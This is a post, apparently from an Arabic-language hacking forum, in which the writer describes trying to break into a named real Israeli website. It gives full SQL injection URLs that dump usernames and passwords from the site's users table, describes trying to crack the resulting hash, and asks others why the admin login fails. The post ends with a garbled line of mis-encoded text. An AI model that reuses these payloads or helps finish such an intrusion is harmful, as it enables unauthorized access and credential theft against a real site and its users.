السلا م عليكم
حاولت اختراق الموقع الاسرائيلي smilies3
http://www.maarav.org.il
.........وبعدة استخراج اليوزر والباسورد
وادخالها في لوحة التحكم
http://maarav.org.il/wp-login.php
لم يقبلها الموقع smilies4
وايكم الحقنة :Great:
كود PHP:
http://www.maarav.org.il/classes/PUItem.php?id=-959+UNION+SELECT+1,2,concat(user_name,0x3a, password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ users
فجربت كما بالدرس تغيير اسم الجدول :666:
الى ان الموقع يحتوي على اسم واحد.............:a09:
فغيرت السيجما.............فطلعلي نفس الباس smilies11
..........ربما يكون الباس مشفر فجربت افك التشفير من الموقع smilies4
http://hashkiller.com/password/X&1poW
وللاسف لم يقبل الباس smilies6
....................اين الخطء اذا g090
*ملاحضة*....عندما اضيف كلمة
Group_
بجانب
concat(user_name,0x3a, password)
يعني لم تصبح الحقنة هكذا
كود PHP:
http://www.maarav.org.il/classes/PUItem.php?id=-959+UNION+SELECT+1,2,group_concat(user_name,0x3a, password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ users
يعطيني عدة باسوردات ايعني هذا انها عضوية الاعضاء وليس المدير...... !
المرجو الاجابة لان الموضوع جنني :a02:
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC la;gm td lph,gj prk l,ru di,]d